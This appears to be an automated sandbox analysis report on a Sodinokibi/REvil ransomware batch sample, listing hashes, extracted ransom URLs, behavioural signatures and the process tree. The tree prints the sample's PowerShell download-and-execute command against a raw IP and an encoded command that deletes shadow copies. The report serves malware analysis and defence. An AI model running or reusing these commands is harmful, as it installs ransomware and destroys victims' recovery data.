Analysis
-
max time kernel
138s -
max time network
35s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
1f7cfad9c19adfc78abd3241e8f95952.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
1f7cfad9c19adfc78abd3241e8f95952.bat
Resource
win10v200430
General
-
Target
1f7cfad9c19adfc78abd3241e8f95952.bat
-
Size
221B
-
MD5
a53b25ea0b566a9f0420007a3d2244af
-
SHA1
eea1e4d5fa16beec4e8cc02e0310345271825017
-
SHA256
91ab18506b352621e098b6e9f0466b7d7b89cd8c70219f71e31d1c689889433b
-
SHA512
1afaad2d92aeee642b9a0802f772b18682942d48fd12eb3f1bf8a30afb3d34a6cf29f05b31c6ea4b12f1d9a1c30e3687ff5eb03b6abb58da8cf0d93d1c106b9e
Malware Config
Extracted
http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952
Extracted
C:\xf62y6e8oc-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84386979D1DC97D2
http://decryptor.cc/84386979D1DC97D2
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1600 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a9ojeds5hau.bmp" powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 240 wrote to memory of 1600 240 cmd.exe powershell.exe PID 1600 wrote to memory of 1216 1600 powershell.exe powershell.exe PID 1600 wrote to memory of 1216 1600 powershell.exe powershell.exe PID 1600 wrote to memory of 1216 1600 powershell.exe powershell.exe PID 1600 wrote to memory of 1216 1600 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeBackupPrivilege 1584 vssvc.exe Token: SeRestorePrivilege 1584 vssvc.exe Token: SeAuditPrivilege 1584 vssvc.exe Token: SeTakeOwnershipPrivilege 1600 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1216 powershell.exe 1216 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe 1600 powershell.exe -
Drops file in Program Files directory 36 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\PopCompress.wax powershell.exe File opened for modification \??\c:\program files\TestDeny.wvx powershell.exe File opened for modification \??\c:\program files\UnregisterStop.potx powershell.exe File opened for modification \??\c:\program files\CompleteSave.vssm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\xf62y6e8oc-readme.txt powershell.exe File opened for modification \??\c:\program files\RestartSplit.aiff powershell.exe File opened for modification \??\c:\program files\StartWatch.asf powershell.exe File opened for modification \??\c:\program files\ProtectEdit.jfif powershell.exe File opened for modification \??\c:\program files\ResetStep.htm powershell.exe File opened for modification \??\c:\program files\ConvertToExpand.html powershell.exe File opened for modification \??\c:\program files\FormatReset.css powershell.exe File opened for modification \??\c:\program files\GroupAssert.ram powershell.exe File opened for modification \??\c:\program files\HideSwitch.mov powershell.exe File opened for modification \??\c:\program files\ReceiveUnpublish.M2T powershell.exe File opened for modification \??\c:\program files\CompleteRemove.wma powershell.exe File opened for modification \??\c:\program files\JoinEdit.html powershell.exe File opened for modification \??\c:\program files\OutDisable.3gp powershell.exe File opened for modification \??\c:\program files\PublishMerge.dwg powershell.exe File created \??\c:\program files\xf62y6e8oc-readme.txt powershell.exe File opened for modification \??\c:\program files\ReadWatch.tmp powershell.exe File opened for modification \??\c:\program files\SplitBackup.js powershell.exe File opened for modification \??\c:\program files\SuspendCompare.zip powershell.exe File created \??\c:\program files (x86)\xf62y6e8oc-readme.txt powershell.exe File opened for modification \??\c:\program files\SubmitDismount.jtx powershell.exe File opened for modification \??\c:\program files\UnprotectMeasure.xls powershell.exe File opened for modification \??\c:\program files\UseRename.cr2 powershell.exe File opened for modification \??\c:\program files\UnblockComplete.tif powershell.exe File opened for modification \??\c:\program files\UninstallStart.nfo powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\xf62y6e8oc-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\xf62y6e8oc-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectPush.wmv powershell.exe File opened for modification \??\c:\program files\ImportUpdate.ADT powershell.exe File opened for modification \??\c:\program files\MountDebug.001 powershell.exe File opened for modification \??\c:\program files\ReceiveGroup.wmf powershell.exe File opened for modification \??\c:\program files\ExpandResume.wmf powershell.exe File opened for modification \??\c:\program files\UninstallSync.vst powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1600 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1f7cfad9c19adfc78abd3241e8f95952.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952');Invoke-QYITNGKHOZRLOK;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1216
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1584